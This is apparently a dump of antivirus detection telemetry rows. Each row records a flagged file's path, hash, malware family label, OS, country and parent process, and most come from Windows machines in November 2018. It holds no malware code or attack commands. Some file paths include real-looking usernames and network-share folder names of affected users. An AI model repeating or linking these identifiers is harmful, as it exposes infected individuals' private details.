  Row(detection=Row(filename='ff686ddb38ece86bc825e748d0468f3a1518cf8a9d10c9c2bb56d87effd76329', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FF686DDB38ECE86BC825E748D0468F3A1518CF8A9D10C9C2BB56D87EFFD76329', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ff686ddb38ece86bc825e748d0468f3a1518cf8a9d10c9c2bb56d87effd76329', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:34:34Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-221520-5dbdc749', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221520-5DBDC749', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playing_the_game.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Playing_the_Game\\Playing_the_Game.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001537-1f09c9df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5d1dd93\\AVSCAN-20181103-001427-17BABDA0\\AVSCAN-20181103-001537-1F09C9DF', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120714-59656dd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1c27c17\\AVSCAN-20181102-120108-24364FDE\\AVSCAN-20181102-120714-59656DD5', filesize=3264000, name='TR/Dldr.Banload.2c9bf3.#M1.#R1'), hash='2c9bf34eceb54e543f267565014c7d108e6acebcecea3a6b4228ff5650e6c77b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:09:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7981074\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:VPluUxWrQDZtznaRkw \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.219\\Your File Is Ready To Download_3105795784.exe', parentsize=2409021, timestamp='2018-11-02T08:43:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151428-929d3c00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151428-929D3C00', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD5725-D41B-FA55-3028-3863E6DB5FB1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sales.exe', filepath='\\\\192.168.27.31\\Networking_Share\\Jessie D\\jessie importante\\jessie\\IO STUFFS\\INVENTORY OFFICER\\PROL\\SALES.exe', filesize=6080000, name='W32/Neshta.A.#M1.#R1'), hash='444f5777b15270dcd76a2eea82ab074978c983421b33f5cb6a175044c070569a', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-02T11:00:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3EBF898E-6BAB-4161-B420-37443DC0569C}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='6ebbbdca14d6cba5f9e4fd4285f89e761d9b468aa87c8756f541a0f1129b1420', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PROXGB\\Win32\\NDIS63\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='18d48af599c5a4f3ca2f3e70974fa1e8273d34815a4483a113040aa1947c08b0', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-02T02:32:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:54:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='11ado0pcs.exe', filepath='C:\\Program Files\\11ADO0PCST\\11ADO0PCS.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='table.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\plugins\\table\\table.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioce428cc5b-5afa-574b-94a2-76d18568564f', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP19.0.0\\Temp\\iocE428CC5B-5AFA-574B-94A2-76D18568564F', filesize=512000, name='TR/Crypt.XPACK.Gen.#M300.#R2423'), hash='3e2fd2fb2bcddf7bd84a09cd1006a27b331b013dbfdcaac0a80fe27ad18b791e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T14:26:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jun 15.bat', filepath='D:\\DOKUMENKU\\LAPOR BI\\TABKU JUN 15\\JUN 15.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-011603-d1467068', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29031212\\AVSCAN-20181102-010557-9E76398A\\AVSCAN-20181102-011603-D1467068', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115433-a51e2d46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67195281\\AVSCAN-20181102-115346-9EE9A257\\AVSCAN-20181102-115433-A51E2D46', filesize=384000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='17ccbea28d13c18a8cc8894ada580b57ba1e843aec3ffd213be2579433d7eb2d', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:54:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2B281F21B6EC5E53939A80DF65B9B361FCE25140E055722265D95073211FA812', filesize=192000, name='TR/Crypt.ZPACK.Gen.#M300.#R555'), hash='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f360fb328a8239d7bb34a83312cdc2a71f6bc246', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\f360fb328a8239d7bb34a83312cdc2a71f6bc246', filesize=2112000, name='Adware/DealPly.38f00c.#M1.#R1'), hash='38f00cebff5d91b0b5ce6cc5e911e21ddf717f8fa39a63cd291918e6b6e4c84a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:46:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105023-26c3fad7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105023-26C3FAD7', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3478938\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='MA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Programs\\JavaSetup_2314384483.exe', parentsize=2446409, timestamp='2018-11-02T22:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcribe.v8.21.2.incl.keymaker.and.patch-core.rar', filepath='D:\\Téléchargement\\Transcribe.v8.21.2.Incl.Keymaker.And.Patch-CORE-1\\.tmp\\Transcribe.v8.21.2.Incl.Keymaker.And.Patch-CORE.rar', filesize=1248000, name='TR/Injector.SF.#M1.#R1'), hash='1e12c879885c10c7be341a0146fcccd566099e4fc2f662bbd5964c6879cfc64b', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T16:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055440-bbd7739d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_894768d7\\AVSCAN-20181102-055335-AD1BBB21\\AVSCAN-20181102-055440-BBD7739D', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132059-ff6b8275', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132059-FF6B8275', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:24:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T22:45:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061457-978c45d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061457-978C45D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:56Z'), dt=datetime.date(2018, 11, 2)),
